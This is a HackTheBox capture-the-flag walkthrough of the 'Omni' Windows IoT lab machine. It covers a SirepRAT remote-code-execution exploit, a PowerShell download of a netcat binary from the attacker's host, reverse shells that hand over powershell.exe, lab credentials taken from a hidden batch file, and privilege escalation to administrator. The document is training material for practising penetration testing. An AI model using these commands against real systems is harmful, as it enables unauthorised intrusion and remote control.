Omni HackTheBox WalkThrough

This is Omni HackTheBox walkthrough. In this writeup, I have demonstrated step by step how I rooted to the Omni HTB machine. Before starting let us know something about this machine. Its OS is not known hence it is categorized as other. Given security level easy by its maker and has been assigned IP address 10.10.10.204.

First of all, connect your local machine with VPN so that you can have access to the lab machines and confirm the connectivity by pinging the IP address 10.10.10.204. If all correct then start hacking.

As usual, I began by scanning the IP address so that I could get some starting point. Nmap [a port scanner] gave the following result.

Scanning

$ nmap -sV -sC -O -oN omni_scan 10.10.10.204

Nmap revealed that ports 135 and 8080 are open. Msrpc is running on port 135 and IIS web server is running over 8080. Ongoing to URL http://10.10.10.204:8008/ found a login page, as we have in tomcat web server and a message, which says Windows Device Portal.

On Googling Windows Device Portal reveals that it a web server through which you can manage and configure your IoT devices remotely using web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.

As I got some information about the software being used, immediately googled Windows Device Portal exploit for available public exploits for this software. Got this article in the first page of the search results. After reading this article came to know that Windows IoT Operating System is affected with a RCE vulnerability in which an attacker can exploit Sirep/WPCon communications protocol to execute command on the OS without dropping payload into the OS. For more information about the exploit and it’s usage you can refer to this GitHub repository.

We have exploit let us use it to confirm whether we have Remote Code Execution or not.

Testing Exploit

$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git

$ cd SirepRAT/

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v

We can clearly see we can execute OS command remotely. Therefore, to get reverse shell I dropped a netcat binary inside the public writeable folder of windows OS and then executed command to connect to our machine. You can get a list of public writable folder from this repository.

Getting Shell

$ python3 -m http.server 80   # To Start python web server locally by hosting nc64.exe file

$ rlwrap nc -nvlp 4321

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v

$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.6 4321 -e powershell.exe" --v

Note: If you are using C:\Windows\System32\spool\drivers\color\ directory to download your binary you may get an error that ‘nc64.exe is being used by some other program’. To avoid this error you can use C:\Windows\System32\spool\ directory and rename the binary from nc64.exe to net1.exe before downloading remotely. Alternatively, follow the command as I have used.

We got a shell. Just confirmed it by running $env:UserName (Used $env because whoami command is not present).

Tried to access C:\Users\ directory to list the number of users in the box but, no user is present inside the Users folder. Used command $net user to list all the users we have.

$ net user

We have two users Administrator and app. However, they are not present in their default directory. May be in some other drive? Let us check. Used $Get-PSDrive PowerShell command to list all the drives in Omni machine.

For more info about Omni machine you can run PowerShell cmdlet $Get-Computerinfo

$ Get-PSDrive

Get-PSDrive tells that omni machine has three drive namely C, D, & U. Changed the drive to U and found the users app and administrator inside the directory U:\Users\. We can capture the user flag now.

$ type U:\Users\app\user.txt

It appears that user flag is encrypted using PowerShell function to prevent unauthorized access. Did not know how to decrypt it. Just googled PowerShell Password Decryption got this appropriate link on first page. According to this website, user.txt can be decrypted using following method.

$ UserCreds = Import-CliXml -Path U:\Users\app\user.txt

$ UserCreds.GetNetworkCredential().Password

When tried to decrypt got error. This error is probably due to unauthorized access to user.txt file. Because user.txt file is owned by user app and currently, we are logged in as omni. So anyhow, we have to login using user app creds. But currently we don’t have any credential of user app. After some enumeration got directory

C:\Program Files\WindowsPowerShell\Modules\PAckageManagement\, which contain a hidden file, named r.bat. The content of the file r.bat can be accessed by using

$ type C:\'Program Files'\WindowsPowerShell\Modules\PAckageManagement\r.bat

From above file got some credentials app : mesh5143 & administrator : _1nt3rn37ofTh1nGz

Since we have login panel at http://10.10.10.204:8080. Let us use credential app : mesh5143 to login as user app.

Login into Portal

We are successfully logged in. Windows Device Portal (WDP) gives us facility to manage all the processes using command prompt. We can run our command using the run command panel.

Since we have already dropped our netcat binary [renamed to net1.exe] inside the directory C:\Windows\System32\Spool\ so, we will use this binary to get reverse connection on our netcat listener locally. As we are now logged in as user app, our reverse shell will be of the user app privilege and we can easily decrypt the content of user.txt file. So ran below command to get shell.

$ rlwrap nc -nvlp 2345 # Run it locally to get reverse connection

$ C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe # on command prompt window of WDP. You can get error as below but you will find your command is executed.

Capture User Flag

$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt

$ $UserCreds.GetNetworkCredential().Password

Privilege Escalation

We also have administrator account credential from the r.bat file. We just need to logout from the user app account and then login to user administrator and follow the same steps as we did with user app. To logout from the user app just close the browser window and clear your browsing history to remove logged in cookie. And then log in using the credentials administrator:_1nt3rn37ofTh1nGz and execute the same command as you did with user app by changing the listening port of netcat.

$ rlwrap nc -nvlp 3456

$ C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe

We got an administrative privilege shell. So we have successfully escalated the privilege to admin user.

Capture Root Flag

# $UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt

# $UserCreds.GetNetworkCredential().Password

This was how I rooted Omni HackTheBox. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. For any query and suggestion related to walkthrough, feel free to contact us at [email protected].